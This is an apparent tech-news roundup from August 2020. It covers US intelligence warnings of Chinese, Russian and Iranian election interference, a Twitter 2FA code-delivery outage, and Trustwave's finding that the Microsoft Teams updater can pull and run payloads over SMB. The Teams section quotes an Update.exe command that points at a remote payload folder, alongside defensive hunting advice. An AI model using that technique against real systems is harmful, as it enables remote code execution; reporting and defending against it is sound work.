With only three months left for U.S. voters to head to the polls, the U.S. Intelligence Community (IC) sounds alarm about upcoming election security and interference from Russia, Iran and China. Meanwhile, Twitter and Microsoft Teams are fighting vulnerabilities that could potentially open the door to hackers.Â
Threats Abound Ahead of 2020 U.S. Presidential Election Â
Following the vulnerability disclosure policy to American voters announced at Black Hat USA 2020 by Election Systems & Software (ES&S), the United States’ intelligence community NCSC on Friday released a statement disclosing the biggest threats that the U.S. elections can face. These moves can be construed as efforts to disburse relevant election securityOpens a new window information to U.S. citizens.
NCSC head William Evanina outlined the three major threats: from China, Russia, and Iran that can impact the inviolability of the 2020 U.S. presidential elections. The November elections this year will see President Trump seeking re-election, as he is challenged by former Vice President Joe Biden.
The 2016 election was marred by controversy with suspicions of tampering and interference, mainly from Russia, either with or without the help of technology. However, the report by special counsel and former FBI Director Robert Mueller failed to link Trump allegedly being in cahoots with Russia. Now, the intelligence community has assessed that besides Russia, China and Iran may have vested interest in the democratic process.
Interference could be achieved through cyber-driven means to tamper the voting process, steal confidential/sensitive data, and/or challenge the election outcome validity. Questioning offline issues, President Trump floated the idea of postponing 2020 elections citing the risks of mail-in/postal ballots.
With Universal Mail-In Voting (not Absentee Voting, which is good), 2020 will be the most INACCURATE & FRAUDULENT Election in history. It will be a great embarrassment to the USA. Delay the Election until people can properly, securely and safely vote???
— Donald J. Trump (@realDonaldTrump) July 30, 2020Opens a new window
This suggestion was not well received among opposition and by some members of Trump’s own party.
NCSC stated read, “Many foreign actors have a preference for who wins the election, which they express through a range of overt and private statements; covert influence efforts are rarer. We are primarily concerned about the ongoing and potential activity by China, Russia, and Iran.â€
The statement said China wants to oust the incumbent President Trump while the Russians vied to keep him in power. The Trump administration’s policies toward Iran can impel the Middle-Eastern country to spread disinformation online with the goal of anti-incumbency, the release added.
The press release stated:
- “CHINA – We assess that China prefers that President Trump – whom Beijing sees as unpredictable – does not win reelection. China has been expanding its influence efforts ahead of November 2020 to shape the policy environment in the United States, pressure political figures it views as opposed to China’s interests, and deflect and counter criticism of China.â€
- “RUSSIA – We assess that Russia is using a range of measures to primarily denigrate former Vice President Biden and what it sees as an anti-Russia “establishment.â€
- “IRAN – We assess that Iran seeks to undermine U.S. democratic institutions, President Trump, and to divide the country in advance of the 2020 elections. Tehran’s motivation to conduct such activities is, in part, driven by a perception that President Trump’s reelection would result in a continuation of U.S. pressure on Iran in an effort to foment regime change.â€
Election Security Lead at the National Security Agency, Dave Imbordino during a panel discussion Friday as part of the 2020 DEFCON convention said, “There’s more people in the game. They’re learning from each other. Influence is a cheap game to get into now with social media. It doesn’t cost a lot of money. You can try to launder your narratives online through different media outlets. That’s something we’re laser-focused on as well.â€
See Also: 5 Key Takeaways From Black Hat 2020
Twitter Faces 2FA Outage
Twitter is entangled in yet another security related embroilment only weeks after it managed to patch up flaws in Twitter for Android app. Users on the microblogging site were unable to log into their accounts on the web version of Twitter. This was due to an interruption in authentication services, due to which users didn’t receive account verification codes generally sent through text messages and/or phone calls. Â
Users were locked out of their account for days. Those with two factor authentication (2FA) couldn’t log into their accounts since the service outage pertains to verification code delivery (either via text or calls).
I’m trying to access my account and it says I need to reset the password to be able to log in but then it won’t let me reset the password??? Please somebody help me. Thank you pic.twitter.com/S4V7muxmssOpens a new window
— TAG_ViperMan (@YouTubeViperMan) August 14, 2020Opens a new window
See Also: Twitter Patches Android Vulnerability That Could Allow Hackers to Access DMs
PLEASE UNLOCK @alrightdakotaOpens a new window ITS BEEN STUCK LIKE THIS FOR HOURS DESPITE ME HAVING ACCESS TO BOTH EMAIL AND PHONE pic.twitter.com/pt8gUW6spuOpens a new window
— ash (@anakinftrey) August 13, 2020Opens a new window
There’s a workaround for those locked out: users can still use the backup/recovery code. The backup code is generated for everyone with 2FA, which users need to memorize or store in a safe location. Twitter provisioned this in case a user loses their phone or the network is unavailable for text or call-based verification.
If users do not have 2FA, they can activate on mobile apps and navigate to Settings and Privacy > Account > Security > Backup Code to get the backup code.
Twitter issued the following statement:
We have more work to do with fixing verification code delivery, but we’re making progress. We’re sorry for the frustration this has caused and appreciate your patience while we keep working on this. We hope to have it sorted soon for those of you who aren’t receiving a code.
— Twitter Support (@TwitterSupport) August 13, 2020Opens a new window
See Also: AttackIQ Sets Out to Fix Enterprise Security With PSE Solution
Trustwave Exposes Microsoft Teams Design Flaw
A security risk in Microsoft Teams can allow threat actors to remotely deliver and execute arbitrary files for malicious activity. Initially discovered in 2019, the risk allowed hackers to push a malicious package by exploiting a flaw in the collaboration application’s Update command. Microsoft issued a fix for the known risk. However, current Lead Threat Architect for SpiderLabs at Trustwave, Reegun JayapaulOpens a new window found out that the fix was not enough.
Jayapaul explained in a blogOpens a new window , “The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.â€
Jayapaul was also the one to discover the flaw last year. He found out that while Microsoft’s patch could prevent hackers from delivering a malicious payload from an unrecognized location, they could still circumvent this by using Microsoft’s Server Message Block (SMB).
As shown in the image below, the Microsoft patch allowed only those folders stored, shared and networked locally to be accessed and updated.Â
While this increases complexity for the attacker, they can still accomplish their malicious activities by placing the file(s) inside the network in an open and shared folder, and access those from the target’s system. A Samba server can be utilized for the same, using the command:Â
Command: Update.exe –update=\remoteserverpayloadFolder
What this means is that Teams Update can be considered a LOLbin or Living off the Land binaries, and vulnerable to remote code execution without privileged access.
Jayapaul presented the proof of concept.
Microsoft Teams – Arbitrary code execution #lolbinOpens a new window #threathuntOpens a new window #dfirOpens a new window #blueteamOpens a new window #redteamOpens a new window pic.twitter.com/4d4FY2zf89Opens a new window
— Reegun J (@reegun21) August 5, 2020Opens a new window
Despite this discovery, Redmond responded to Trustwave citing hampering of customer operational constraints as the reason they cannot curb SMB sourced threats. The company said, “Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as “we cannot restrict SMB source for –update because we have customers that apparently rely on this (e.g. folder redirection).â€
Trustwave issued the following recommendations to mitigate risks from LOLBin threats:
Trustwave Recommendations
From the Threat hunting perspective:
- Utilize the EDR solutions and look at “update.exe†command lines for suspicious connections.
- Hunt for squirrel.exe executables and investigate the size of the file, you can use that to differentiate trojan squirrels from the legit squirrel.exe.
- If you are dealing with Microsoft Teams “update.exeâ€, Validate the size and hash, hunt for any anomalies.
- Investigate outgoing SMB connections especially from the Microsoft Teams updater update.exe or filter SMB connections entirely at the perimeter if unnecessary.
- Request customer or IT for any security exclusions placed for Microsoft Teams packages and review the change applied.
- IT should install the Microsoft Teams under the “Program Files†folder, so an attacker cannot drop and execute the remote payload; this can be carried out by Group policy.
- Disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team.
Let us know if you liked this news on LinkedInOpens a new window , TwitterOpens a new window , or FacebookOpens a new window . We would love to hear from you!